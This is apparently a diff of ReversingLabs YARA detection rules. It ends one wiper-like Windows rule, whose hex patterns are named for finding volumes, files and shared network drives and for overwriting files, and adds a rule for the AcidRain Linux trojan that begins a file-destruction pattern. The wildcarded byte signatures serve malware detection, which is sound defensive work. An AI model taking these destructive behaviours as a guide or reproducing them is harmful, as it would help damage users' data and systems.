+            C6 45 ?? ?? 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 45 ?? 8B 8D ??
+            ?? ?? ?? 51 0F 43 C7 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ??
+            8B 55 ?? 83 E6 ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81
+            FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52
+            51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            80 BD ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 75 ?? 8A 85 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ??
+            ?? 3C ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            74 ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 50 ?? C6 85 ?? ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 8D ?? ?? ??
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 CE ?? C6 45 ?? ?? 89 B5 ?? ?? ?? ?? 8D
+        }
+		$find_files_p3 = {
+            4D ?? 8B 75 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 46 ?? 50 E8
+            ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 56 0F 43 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B C7 8B 4D ?? 2B C1 8B 55 ?? 8B 75 ?? 3B D0 76 ?? 8B
+            C6 2B C2 3B C1 72 ?? 83 FF ?? 8D 45 ?? 51 0F 43 45 ?? 8D 8D ?? ?? ?? ?? 50 6A ?? E8
+            ?? ?? ?? ?? EB ?? 83 FE ?? 8D 85 ?? ?? ?? ?? 52 0F 43 85 ?? ?? ?? ?? 8D 4D ?? 50 E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E
+            40 ?? 66 0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? 8B B5 ?? ??
+            ?? ?? 83 E6 ?? 83 CE ?? 8B 55 ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 55
+            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
+            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
+            ?? F6 85 ?? ?? ?? ?? ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D
+            95 ?? ?? ?? ?? 52 8D 55 ?? 52 8B 40 ?? FF D0 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F
+            84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 42 ?? 3B C8 77 ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 49
+        }
+		$find_files_p4 = {
+            23 C1 89 85 ?? ?? ?? ?? 03 C2 23 C1 8B 8D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 83 3C 0F
+            ?? 75 ?? 6A ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 89 04 0F 8B 8D ?? ?? ?? ??
+            8B 0C 0F 8D 45 ?? 50 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? 85
+            C9 0F 84 ?? ?? ?? ?? 8B 01 8D 95 ?? ?? ?? ?? 52 8D 55 ?? 52 FF 50 ?? 8B 55 ?? C6 45
+            ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B
+            C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ??
+            ?? ?? 8B 55 ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 8D ?? ?? ?? ?? 85 C9 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
+            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85
+            C9 74 ?? 8B 11 8D 45 ?? 3B C8 0F 95 C0 0F B6 C0 50 FF 52 ?? 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_shared_network_drives_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 7D ?? 89 BD ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? C7
+            47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? B1 ?? 88 45 ?? 0F 57 C0 8A 45 ?? BE ?? ?? ?? ?? 32
+            C1 C7 45 ?? ?? ?? ?? ?? 0F 11 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 E6
+            6A ?? 68 ?? ?? ?? ?? 52 50 C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 32 85
+            ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ??
+            8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8
+            ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ??
+            ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A
+        }
+		$find_shared_network_drives_p2 = {
+            68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8B C1
+            F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ?? 88 85 ?? ??
+            ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 8B C8 32 85 ?? ?? ?? ??
+            88 85 ?? ?? ?? ?? 8B C1 F7 E6 6A ?? 68 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 32 85 ?? ??
+            ?? ?? 8D 4D ?? 88 85 ?? ?? ?? ?? 8D 51 ?? 0F 10 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 0F 11 45 ?? C6 45 ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51
+            50 8D 4D ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 45 ?? ??
+            0F 57 C0 89 8D ?? ?? ?? ?? 0F 11 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 4D ?? 66 66 66
+            0F 1F 84 00 ?? ?? ?? ?? 8A 84 35 ?? ?? ?? ?? 32 C1 88 44 35 ?? 8B C1 F7 E7 6A ?? 68
+            ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 46 8B C8 83 FE ?? 72 ?? 0F 10 45 ?? 8B BD ?? ?? ??
+            ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 8D 51 ?? 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? 0F 1F 00 8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? BE ??
+            ?? ?? ?? 89 B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ??
+            ?? 8B CF C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01 41 84
+        }
+		$find_shared_network_drives_p3 = {
+            C0 75 ?? 2B CA 51 57 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45
+            ?? 8D 4D ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 83 CE ?? 51 0F 10 00 68 ?? ?? ?? ?? 6A ?? 0F 11 45 ?? 89 B5 ?? ??
+            ?? ?? F3 0F 7E 40 ?? 66 0F D6 45 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00
+            ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 85
+            C0 0F 94 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
+            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 83 FA
+            ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
+            83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 80 BD ?? ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 51 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 8B CE C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 56 8D
+            4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 8B 7D ?? BA ?? ?? ?? ?? 0F 43 75 ?? 33 C9
+            85 FF 74 ?? 0F 1F 40 ?? 0F B6 04 31 41 33 C2 69 D0 ?? ?? ?? ?? 3B CF 72 ?? 23 95 ??
+            ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B
+            04 D7 8B F0 89 85 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 3B C1 75 ?? 8B C1 EB ?? 8B 44 D7
+        }
+		$find_shared_network_drives_p4 = {
+            8B 00 3B F0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 4E ?? 8B 79 ?? 8D 55 ?? 0F 43 55 ?? 83
+            79 ?? ?? 72 ?? 8B 09 3B 7D ?? 75 ?? 83 EF ?? 72 ?? 0F 1F 80 ?? ?? ?? ?? 8B 01 3B 02
+            75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ?? 83 FF ?? 74 ?? 8A 01 3A 02 75 ?? 83 FF ?? 74
+            ?? 8A 41 ?? 3A 42 ?? 75 ?? 83 FF ?? 74 ?? 8A 41 ?? 3A 42 ?? 75 ?? 83 FF ?? 74 ?? 8A
+            41 ?? 3A 42 ?? 74 ?? 1B C0 83 C8 ?? EB ?? 33 C0 85 C0 74 ?? 8B 36 8B 95 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 46 ?? 50 8D
+            45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 84 C0 0F 45 F7 EB ?? 8B
+            BD ?? ?? ?? ?? 8B F1 8D 4D ?? E8 ?? ?? ?? ?? 3B F7 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ??
+            ?? 8D 7D ?? 83 7D ?? ?? 8B CE C7 45 ?? ?? ?? ?? ?? 0F 43 7D ?? C7 45 ?? ?? ?? ?? ??
+            C6 45 ?? ?? 8D 51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 56 8D 4D ?? E8 ?? ?? ?? ?? 8D
+            45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ??
+            68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 10 00 0F 11 45 ?? F3 0F 7E 40 ?? 66 0F D6 45 ?? C7 40
+            ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 00 ?? FF B5 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 78 ?? ?? 72 ??
+            8B 00 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+        }
+		$find_shared_network_drives_p5 = {
+            75 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 8D 85 ?? ??
+            ?? ?? 50 56 8D 85 ?? ?? ?? ?? 50 6A ?? 57 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 56 3D ?? ?? ?? ?? 75 ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
+            F6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 85 F6 74 ?? 8B BD ?? ?? ?? ?? 8B 4F ?? 39 4F ?? 74 ?? 8B D6 C7 41 ??
+            ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? 8D 7A ?? 0F 1F 80 ?? ?? ?? ?? 8A 02 42 84
+            C0 75 ?? 2B D7 52 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 40 ?? ?? EB ?? 8D 85 ?? ??
+            ?? ?? 50 51 8B CF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 30 8D 85 ?? ?? ?? ?? 50 8B 7E ?? 57 56 E8 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? 8B D0 B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ?? ?? ?? ?? 41 89 8D
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 56 ?? 89 17 8B 85 ?? ?? ?? ?? 8B 00 50 83 C0 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
+            ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD
+            ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 41 89 8D ?? ?? ?? ?? 81 F9
+            ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ??
+            8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45
+        }
+		$overwrite_files_1 = {
+            55 8B EC 83 EC ?? 53 8B 5D ?? 56 8B 75 ?? 53 56 FF 75 ?? 89 5D ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 3B C6 0F 85 ?? ?? ?? ?? 3B D3 0F 85 ?? ?? ?? ?? 57 8B 7D ?? 33 C0 89 45 ?? 85
+            FF 0F 84 ?? ?? ?? ?? 8B DE 6A ?? FF 75 ?? FF 77 ?? FF 77 ?? E8 ?? ?? ?? ?? 8B FA 8B
+            F0 8B 45 ?? 57 56 FF 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 03 DE 89 45 ??
+            8B C2 13 CF 89 45 ?? 39 5D ?? 75 ?? 3B C1 75 ?? 8B 7D ?? 33 F6 8B 1F 0F AF 5D ?? 85
+            DB 74 ?? 8B 45 ?? 8B FB 2B FE 3B C7 0F 42 F8 57 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B
+            45 ?? 83 C4 ?? 03 F7 80 7D ?? ?? 75 ?? 3B F0 74 ?? 3B F3 72 ?? 8B 7D ?? 8B 45 ?? 8B
+            5D ?? 01 75 ?? 50 53 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C3 75 ?? 3B 55 ?? 75 ?? 8B
+            7F ?? 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$overwrite_files_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B 75 ?? 8D 85 ?? ??
+            ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 32 DB 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 56 E8 ?? ?? ?? ?? 8B F8 83 C4 ??
+            83 FF ?? 0F 84 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 80 B8 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B F0 83 C4 ??
+            89 B5 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB E8 ?? ?? ?? ?? 83 C4
+            ?? 89 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 53
+            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 85 D2 75 ?? 68 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 75 ?? 50 E8 ?? ??
+            ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 8B F0 8B C2 50 56 57 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B C6 75 ?? 3B
+            95 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 53 57 E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 6A
+            ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 0B C2 75 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 0F
+            B6 DB 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 D9 8B B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 4D ?? 8A C3 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 57
+            E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 85 D2 0F 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
+        }
 
-rule REVERSINGLABS_Cert_Blocklist_018093Cfad72Cdf402Eecbe18B33Ec71 : INFO FILE
+	condition:
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_volumes_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $find_shared_network_drives_p* ) ) and ( all of ( $overwrite_files_* ) )
+}
+rule REVERSINGLABS_Linux_Trojan_Acidrain : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects AcidRain trojan."
 		author = "ReversingLabs"
-		id = "d9ab2e5c-a107-53c1-9b8d-b4625eed03b0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "802c7eb7-d407-5b07-a6b4-4648d3ad80e9"
+		date = "2024-05-10"
+		modified = "2024-05-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5806-L5822"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Linux.Trojan.AcidRain.yara#L1-L67"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ac398ef89e691158742598777c320832a750a7410904448778afc7ef3c63c255"
+		logic_hash = "5b47a0de8bda09d217f8a148e561f3da7ce4945f011f4a9b5dbbca88157d3080"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Trojan"
+		tc_detection_name = "AcidRain"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$destroy_files_using_ioctls = {
+            55 89 E5 57 BF ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 7C 24 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? 85 C0 89 C3 78 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D
+            C3 8D 45 ?? BE ?? ?? ?? ?? 89 44 24 ?? 89 74 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 4D ??
+            8B 55 ?? C7 45 ?? ?? ?? ?? ?? 85 C9 89 55 ?? 74 ?? 8D 75 ?? 8D B6 ?? ?? ?? ?? 8D BF
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ??
